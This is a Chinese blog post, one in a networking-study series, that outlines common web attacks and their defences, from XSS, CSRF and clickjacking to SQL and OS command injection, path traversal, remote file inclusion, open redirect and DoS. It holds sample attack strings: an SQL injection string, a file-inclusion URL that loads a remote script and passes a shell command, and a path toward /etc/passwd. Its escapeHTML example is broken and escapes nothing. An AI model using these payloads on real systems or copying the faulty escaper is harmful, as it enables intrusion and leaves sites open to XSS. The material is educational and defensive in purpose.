常见的Web攻击及防御办法 - 重学计算机网络系列(5)

Web攻击分类

简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。

web应用的攻击模式有以下两种

  • 主动攻击(主要攻击服务器上的资源)
    • SQL注入攻击
    • OS命令注入攻击
    • 其他
  • 被动攻击(主要攻击用户的资源和权限)
    • 跨站脚本攻击
    • 跨站点请求伪造
    • 点击劫持(与跨站请求伪造手法相似)
    • HTTP首部注入攻击
    • 其他

      跨站脚本攻击(XSS)

      跨站脚本攻击(XSS)是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。动态创建的HTML部分有可能隐藏着安全漏洞。就这样,攻击者编写脚本设下陷阱,用户在自己的浏览器上运行时,一不小心就会受到被动攻击。目的:利用网站漏洞从用户那里恶意盗取信息

XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。但是发展到今天,由于JavaScript的强大功能以及网站前端应用的复杂化,是否跨域已经不再重要。但是由于历史原因,XSS这个名字却一直保留下来。

XSS分类

  • 反射型XSS(非持久型XSS)
  • DOM型XSS(非持久性XSS)
  • 存储型XSS(持久性XSS攻击)

反射型XSS

  • 攻击构造出特殊的 URL ,其中包含恶意代码。(这个恶意代码诸如第三方的JS或document.cookie等)
  • 用户被诱导打开带有恶意代码的 URL,服务器端将恶意代码从 URL 中取出当做参数处理,然后返回给用户带有恶意代码的数据。
  • 用户浏览器接收到响应解析执行,混在其中的恶意代码也被执行。
  • 恶意代码窃取用户敏感数据发送给攻击者,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。

DOM型XSS

从效果上来说也是反射型XSS,单独划分出来,是因为DOM Based XSS的形成原因比较特别,发现它的安全专家专门提出了这种类型的XSS。出于历史原因,也就把它单独作为一个分类了。

  • 攻击者构造出特殊的 URL,其中包含恶意代码。
  • 用户被诱导打开带有恶意代码的 URL。
  • 用户浏览器接收到响应后解析执行,前端 JavaScript 取出 URL 中的恶意代码并执行。
  • 恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。

存储型XSS

存储型 XSS 跟 反射型 XSS 的区别是:存储型 XSS 的恶意代码存在服务器上,反射型 XSS 的恶意代码存在 URL 里。它是最危险的一种跨站脚本。比反射性 XSS 和 DOM 型 XSS 都更有隐蔽性,因为它不需要用户手动触发。任何允许用户存储数据的 Web 程序都可能存在存储型 XSS 漏洞。若某个页面遭受存储型 XSS 攻击,所有访问该页面的用户都会被 XSS 攻击。

  • 攻击者把恶意代码提交到目标网站的服务器中。
  • 用户打开目标网站,网站服务器端把带有恶意代码的数据取出,当做正常数据返回给用户。
  • 用户浏览器接收到响应解析执行,混在其中的恶意代码也被执行。
  • 恶意代码窃取用户敏感数据发送给攻击者,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。

防御方法

  • 浏览器自带防御(X-XSS-Protection)
    HTTP X-XSS-Protection 响应头是 Internet Explorer,Chrome 和 Safari 的一个功能,当检测到跨站脚本攻击(XSS)时,浏览器将停止加载页面。其原理是检查 URL 和 DOM 中元素的相关性,但这并不能完全防止反射型 XSS,而且也并不是所有浏览器都支持 X-XSS-Protection。
    X-XSS-Protection: 0     
    禁止XSS过滤。     
    

X-XSS-Protection: 1
启用XSS过滤(通常浏览器是默认的)。 如果检测到跨站脚本攻击,浏览器将清除页面(删除不安全的部分)。

X-XSS-Protection: 1; mode=block
启用XSS过滤。 如果检测到攻击,浏览器将不会清除页面,而是阻止页面加载。

X-XSS-Protection: 1; report=
启用XSS过滤。 如果检测到跨站脚本攻击,浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。

- 转义  
XSS攻击主要是通过构造特殊字符来注入脚本。所以在客户端与服务端都进行输入检测,然后对用户输入的数据进行转义。

function escapeHTML(str) {
if (!str) return ‘’;
str = str.replace(/&/g, “&”);
str = str.replace(/</g, “<”);
str = str.replace(/>/g, “>”);
str = str.replace(/“/g, “"”);
str = str.replace(/‘/g, “'”);
return str;
};

- 过滤  
在富文本中因为需要保留 HTML ,所以我们不能使用转义的方法防御 XSS 攻击,这里使用过滤的方式防御 XSS 攻击,也就是通过只使用白名单允许的 HTML 标记及其属性,来防御攻击。

- 内容安全策略(csp)   
实质是白名单策略,开发者明确告诉客户端,哪些外部资源可以加载和执行,大大增强了网页的安全性。

# 跨站请求伪造(CSRF)
叫做“攻击者伪造请求”,更好理解。
- 用户登录一些官方网站。
- 攻击者伪造一个链接或事件,诱导用户去点击。
- 用户触发事件后(点击或者触发其他什么事件),执行操作。用户执行了表面的操作,实际上攻击者利用用户触发这个事件,伪造用户在官方网站做一些事情。

## 例子
- 张三登录了购物网站。
- 之后张三不小心点击了攻击者的恶意链接。
- 在点击链接之后,张三的购物车被清空。此时,张三还并不知情。

## 分析攻击者为什么能成功
- 张三如果第一次登录购物网站,网站要求用户输入用户名和命名,验证正确才能进入。
- 此时购物网站在张三登录成功之后,会给张三Cookie(里面有Session ID),下次张三登录的时候可以不必输入用户名密码,靠着Session ID 就可以直接进入。
- 若张三点击了攻击者的事件之后,其实就是伪造用户去进入购物网站然后执行一些操作。(利用张三的权限去做事情)
- 此时购物网站的服务器会认为是张三本人在做的一些操作,因为有Session ID。

## CSRF特点
- 攻击一般发起在第三方网站,而不是被攻击的网站。
- 攻击是利用受害者在被攻击网站的登录凭证,冒充受害者提交操作,仅仅是“冒用”,而不是直接窃取数据。
- 攻击者预测出被攻击的网站接口的所有参数,成功伪造请求。

## 防御方法
- SameSite 属性     
Cookie 的 SameSite 属性用来限制第三方 Cookie,从而减少安全风险,可以用来防止 CSRF 攻击和用户追踪。

- 同源检测  
在 HTTP 协议中,每一个异步请求都会携带两个 Header ,用于标记来源域名:
    - Origin Header
    - Referer Header 

这两个 Header 在浏览器发起请求时,大多数情况会自动带上,并且不能由前端自定义内容。 服务器可以通过解析这两个 Header 中的域名,确定请求的来源域。

通过校验请求的该字段,我们能知道请求是否是从本站发出的。我们可以**通过拒绝非本站发出的请求**,来避免了 CSRF 攻击。

# 点击劫持
点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的`iframe`,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的`iframe`页面。通过调整`iframe`页面的位置,可以诱使用户恰好点击在`iframe`页面的一些功能性按钮上。

原理很简单:
- 通过`z-index`属性让其位于最上层。
- 通过`opacity`属性让其透明度为0。

>点击劫持攻击与CSRF攻击(详见“跨站点请求伪造”一章)有异曲同工之妙,都是在用户不知情的情况下诱使用户完成一些动作。但是在CSRF攻击的过程中,如果出现用户交互的页面,则攻击可能会无法顺利完成。与之相反的是,点击劫持没有这个顾虑,它利用的就是与用户产生交互的页面。

## Flash点击劫持
案例:
- 攻击者制作了一个Flash游戏,并诱使用户来玩这个游戏。这个游戏就是让用户去点击“CLICK”按钮,每次点击后这个按钮的位置都会发生变化。
- 在其上隐藏了一个看不见的iframe。
- 攻击通过诱导用户鼠标点击的位置,能够完成一些较为复杂的流程。
- 最终通过这一步步的操作,打开了用户的摄像头。

## 其他的点击劫持
- 图片覆盖攻击
- 拖拽劫持
- 触屏劫持(发生在智能手机上的攻击)

# HTTP首部注入攻击
HTTP首部注入攻击(HTTP Header Injection)是指攻击者通过在**响应首部字段**内插入换行,添加任意响应首部或主体的一种攻击。属于被动攻击模式。
>向首部主体内添加内容的攻击称为HTTP响应截断攻击(HTTP Response Splitting Attack)。

如下所示,Web应用有时会把从外部接收到的数值,赋给响应首部字段`Location`和`Set-Cookie`。

Loaction: http://www.example.com/a.cgi?q=12345
Set-Cookie: UID=12345

## 危害
- 设置任何Cookie信息
- 重定向至任意URL
- 显示任意的主体(HTTP响应截断攻击)

# SQL注入攻击
>注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,**第一个是用户能够控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据**。

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。


>比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.

## 如何防御SQL注入攻击
- 使用预编译语句,绑定变量。`(最佳方式)    `     

使用预编译的SQL语句,SQL语句的语义不会发生改变。在SQL语句中,变量用`?`表示,攻击者无法改变SQL的结构,在上面的例子中,即使攻击者插入类似于`tom' or'1'='1`的字符串,也只会将此字符串当做`username`来查询。
- 使用安全的存储过程对抗SQL注入。          

使用存储过程的效果和使用预编语句译类似,其区别就是存储过程需要先将SQL语句定义在数据库中。但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用`严格的输入过滤`或者是`编码函数`来处理用户的输入数据。

- 检查数据类型  

检查输入数据的数据类型,在很大程度上可以对抗SQL注入。比如用户在输入邮箱时,必须严格按照邮箱的格式;输入时间、日期时,必须严格按照时间、日期的格式,等等,都能避免用户数据造成破坏。但数据类型检查并非万能,如果需求就是需要用户提交字符串,比如一段短文,则需要依赖其他的方法防范SQL注入。

- 使用安全函数
- 使用最小权限原则,避免Web应用直接使用root、dbowner等高权限账户直接连接数据库。    
如果有多个不同的应用在使用同一个数据库,则也应该为每个应用分配不同的账户。Web应用使用的数据库账户,不应该有创建自定义函数、操作本地文件的权限。

# OS命令注入攻击
OS命令注入攻击(OS Command Injection)是指通过Web应用,执行非法的操作系统命令达到攻击的目的。**只要在能调用Shell函数的地方就有存在被攻击的风险**。

OS命令注入攻击可以向Shell发送命令,让Windows或Linux操作系统的命令行启动程序。也就是说,通过OS注入攻击可执行OS上安装着的各种程序。

## 产生的原因
- 使用了内部调用Shell的函数(system、open等)
- 将倍加传入的参数传递给内部调用的shell的函数
- 参数中shell的元字符没有被转义

## 防御对策
- 选择不调用OS命令的实现方法。不调用利用shell的功能,既能杜绝了OS命令注入漏洞混入的可能性,又消除了调用OS命令的而系统开销,能够从多方面提高应用的性能。
- 不将外界输入的字符串传递给命令行参数。
- 使用安全的函数对传递给OS命令参数进行转义。

# 其他一些Web攻击
## 目录遍历攻击
目录遍历(Directory Traversal)攻击是指对本无意公开的文件目录,通过非法截断其目录路径后,达成访问目的的一种攻击。这种攻击有时也称为路径遍历(PathTraversal)攻击。

通过Web应用对文件处理操作时,在由外部指定文件名的处理存在疏漏的情况下,用户可使用.../等相对路径定位到/etc/passed等绝对路径上,因此服务器上任意的文件或文件目录皆有可能被访问到。这样一来,就有可能非法浏览、篡改或删除Web服务器上的文件。

固然存在输出值转义的问题,但更应该关闭指定对任意文件名的访问权限。

## 远程文件包含漏洞
远程文件包含漏洞(Remote File Inclusion)是指当部分脚本内容需要从其他文件读入时,攻击者利用指定外部服务器的URL充当依赖文件,让脚本读取之后,就可运行任意脚本的一种攻击。

这主要是PHP存在的安全漏洞,对PHP的`include或require`来说,这是一种可通过设定,指定外部服务器的URL作为文件名的功能。但是,该功能太危险,PHP5.2.0之后默认设定此功能无效。

固然存在输出值转义的问题,但更应控制对任意文件名的指定。

源代码:
http://example.com/foo.php?mod=news.php

经过攻击后:
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=1s

攻击者通过把要引入的文件替换成自己的文件,就能攻击到服务器了。

## 不正确的错误消息处理
不正确的错误消息处理(Error Handling Vulnerability)的安全漏洞是指,Web应用的**错误信息内包含对攻击者有用的信息**。与Web应用有关的主要错误信息如下所示。
- Web应用抛出的错误消息
- 数据库等系统抛出的错误消息

Web应用不必在用户的浏览画面上展现详细的错误消息。对攻击者来说,详细的错误消息有可能给他们下一次攻击以提示。

## 开放重定向
开放重定向(Open Redirect)是一种对指定的任意URL作重定向跳转的功能。而与此功能相关联的安全漏洞是指,假如指定的重定向URL到某个具有恶意的Web网站,那么用户就会被诱导至那个Web网站。

原URL:
http://example.com/?redirect=http://www.tricorder.jp

被攻击后:
http://example.com/?redirect=http://hackr.jp

```
用户看到URL后原以为访问example.com,不料实际上被诱导至hackr.jp这个指定的重定向目标。

可信度高的Web网站如果开放重定向功能,则很有可能被攻击者选中并用来作为钓鱼攻击的跳板。

密码破解

密码破解攻击(Password Cracking)即算出密码,突破认证。攻击不仅限于Web应用,还包括其他的系统(如FTP或SSH等)。有以下几种破解方法:

  • 穷举法
    对所有密钥集合构成的密钥空间(Keyspace)进行穷举。即,用所有可行的候选密码对目标的密码系统试错,用以突破验证的一种攻击。
  • 字典攻击
    利用事先收集好的候选密码(经过各种组合方式后存入字典),枚举字典中的密码,尝试通过认证的一种攻击手法。

    字典攻击中有一种利用其他Web网站已泄露的ID及密码列表进行的攻击。很多用户习惯随意地在多个Web网站使用同一套ID及密码,因此攻击会有相当高的成功几率

DoS攻击

DoS攻击(Denial of Service attack)是一种让运行中的服务呈停止状态的攻击。有时也叫做服务停止攻击或拒绝服务攻击。DoS攻击的对象不仅限于Web网站,还包括网络设备及服务器等。

有两种DOS攻击方式:

  • 集中利用访问请求造成资源过载,资源用尽的同时,实际上服务也就呈停止状态。(海量请求导致服务器瘫痪,服务器很难分辨何为正常请求,何为攻击请求,因此很难防止DoS攻击。)
  • 通过攻击安全漏洞使服务停止。

多台计算机发起的DoS攻击称为DDoS攻击(DistributedDenial of Service attack)。DDoS攻击通常利用那些感染病毒的计算机作为攻击者的攻击跳板。

后门程序

后门程序(Backdoor)是指开发设置的隐藏入口,可不按正常步骤使用受限功能。利用后门程序就能够使用原本受限制的功能。

通常的后门程序分为以下3种类型。

  • 开发阶段作为Debug调用的后门程序
  • 开发者为了自身利益植入的后门程序
  • 攻击者通过某种方法设置的后门程序

可通过监视进程和通信的状态发现被植入的后门程序。但设定在Web应用中的后门程序,由于和正常使用时区别不大,通常很难发现。

参考文献

结语

我的计算机网络学习之旅暂时就结束了。因为大四还在实习,白天还需要完成公司的任务,只能在晚上或者周末去公司自主学习,前前后后大约有花一两个月的时间。收获很多,这种感觉与当初上计算机网络课的感觉完全不一样,当时上了也就上了,知识都是零零散散的,都没有去串联起来,导致记得不深刻。如今花了心思去整理总结后,有种融会贯通的感觉,在Chrome调试,项目中前后端对接,性能优化方面的认知更为巩固和深刻。


 本篇
常见的Web攻击及防御办法 - 重学计算机网络系列(5) 常见的Web攻击及防御办法 - 重学计算机网络系列(5)
简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。
2020-01-08
下一篇 
HTTPS,HTTP追加协议 - 重学计算机网络系列(4) HTTPS,HTTP追加协议 - 重学计算机网络系列(4)
本篇文章主要讲HTTPS,HTTP和HTTPS区别,认证,SPDY的AJAX与Comet,Websocket
2020-01-08
  目录